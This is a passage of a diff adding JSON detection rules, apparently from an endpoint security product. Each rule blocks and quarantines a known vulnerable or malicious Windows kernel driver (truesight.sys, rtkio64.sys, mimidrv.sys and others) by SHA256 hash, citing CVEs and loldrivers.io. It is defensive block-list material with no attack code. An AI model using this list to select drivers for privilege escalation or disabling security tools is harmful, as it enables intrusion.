+ "type": "hash",
+ "value": "7a4e4ee169fe0f1f079e5f5c1da38ea70fe717e728faf054deb180f9e37fe574",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ddb26a4-3ffd-5213-9fc0-158a00d10dc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457661Z",
+ "creation_date": "2026-03-23T11:45:30.457664Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3308899fc0ebdd04a4dacc386873c25dabe32a8f34607fb335148d2dab667d8",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3df076fe-5644-585b-8486-7e476582899c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499322Z",
+ "creation_date": "2026-03-23T11:45:31.499325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "976eb2b6361c0bec3954b294089e2263084509848381b6ded0d75e87ca074875",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3df50ee6-7969-52d4-8e89-b4d961f4c386",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972160Z",
+ "creation_date": "2026-03-23T11:45:29.972162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff115cefe624b6ca0b3878a86f6f8b352d1915b65fbbdc33ae15530a96ebdaa7",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3dfc5d0f-a4da-5a5a-9899-2551aa4abf09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827963Z",
+ "creation_date": "2026-03-23T11:45:31.827964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9efaad2e2089820dc5726e358fa731ba7788d88f8fe1fc243c3afd4cb5fe89dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e0917b3-ccaf-5ad2-b0fa-c0b62955c887",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831985Z",
+ "creation_date": "2026-03-23T11:45:30.831987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a3d046af99f88973d09dd034ac9b49bd74e2abfd829d2d73cc75b5e0d1d6059",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e1979e8-e21f-580d-b3b8-4439c588cbbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477067Z",
+ "creation_date": "2026-03-23T11:45:31.477071Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477081Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d164cd50476f880c4ddd879db399bfbd53fcbbffcba3be9152e69f95d36a1d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e255873-2c5a-5e7c-9949-0ff731100561",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620565Z",
+ "creation_date": "2026-03-23T11:45:29.620567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620573Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e3ac6bb-dbc5-57ab-bf7d-89dc089ebc70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968705Z",
+ "creation_date": "2026-03-23T11:45:29.968707Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968712Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f33f349062cbaa5591760bed8b0185730e043440a302702e3be12554aa62104",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e435f38-e49b-56d1-a942-d08282ab0df5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143650Z",
+ "creation_date": "2026-03-23T11:45:32.143652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ff54579dc4b76e814495d8e1d452a6f868adf06c2de0afdc5c3878b380d0a17",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e441d39-c653-59a6-98f1-15142c8f0ba4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454066Z",
+ "creation_date": "2026-03-23T11:45:30.454069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbf74bed1a4d3d5819b7c50e9d91e5760db1562d8032122edac6f0970f427183",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e4d8d40-0bd2-5cad-a69c-95acadedd0fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465227Z",
+ "creation_date": "2026-03-23T11:45:30.465230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465239Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "492113a223d6a3fc110059fe46a180d82bb8e002ef2cd76cbf0c1d1eb8243263",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e53e505-5d70-5dc2-8354-20d1d0caf359",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808182Z",
+ "creation_date": "2026-03-23T11:45:31.808185Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65ea10f141b979601725e485131626c82f6e173bcfb5bac831fee25d59e4afc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e5abaae-3725-58cd-83dd-1e580af07492",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977647Z",
+ "creation_date": "2026-03-23T11:45:29.977650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09bc9d0606d8b96f1d9fb18741bdb43aa5c188981d298df047b8c75351d68653",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e5bbe79-0cc7-5b5d-992e-60170d476749",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824433Z",
+ "creation_date": "2026-03-23T11:45:31.824437Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0524c94ffc9460a05bce72e9f7d4fa18e3c65012400df223b319e13d2efb156d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e5c96f1-c90c-51c4-aa44-2aceba3ff44b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610159Z",
+ "creation_date": "2026-03-23T11:45:29.610161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b3705b47dc15f2b61ca3821b883b9cd114d83fcc3344d11eb1d3df495d75abe",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e623caa-d5e7-545b-80c0-21ba99691224",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155452Z",
+ "creation_date": "2026-03-23T11:45:31.155454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ef4acefb20d9d76b65695771a22e245851e04a8eb2585a99fa725ece406ba62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e67f682-c09a-5fb6-95cb-1fc57ce5de60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619266Z",
+ "creation_date": "2026-03-23T11:45:29.619268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e6ad2a5-63b5-5bdb-9f2a-108bd94cc804",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618151Z",
+ "creation_date": "2026-03-23T11:45:29.618153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c933f5d07ccb4bd715666cd6eb35a774b266ddd8d212849535a54192a44f667",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e70fd64-6344-506e-8e26-3584a117be24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606812Z",
+ "creation_date": "2026-03-23T11:45:29.606814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "120f7983011211e6740d7a3a4cd2354507866ef7d36a48e2e3a9bd5b52c21c8a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e79a4d9-fdc3-53b9-aefb-a29d269af320",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153339Z",
+ "creation_date": "2026-03-23T11:45:31.153342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d14bcd4178ec57464c6463b19a75b4f0549c42ccedc042c40189d68923215dbd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e842552-ce04-53e9-b0f1-f3ea51b59a92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616433Z",
+ "creation_date": "2026-03-23T11:45:29.616434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc7ebd191e0991fd0865a5c956a92e63792a0bb2ff888af43f7a63bb65a22248",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e8f1022-3f9f-539c-ba00-1a7af2c6af6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824769Z",
+ "creation_date": "2026-03-23T11:45:30.824772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "991f3c936c30da549ef0be83af8cc8efbe2b9727f0437dee607591239b28c44f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
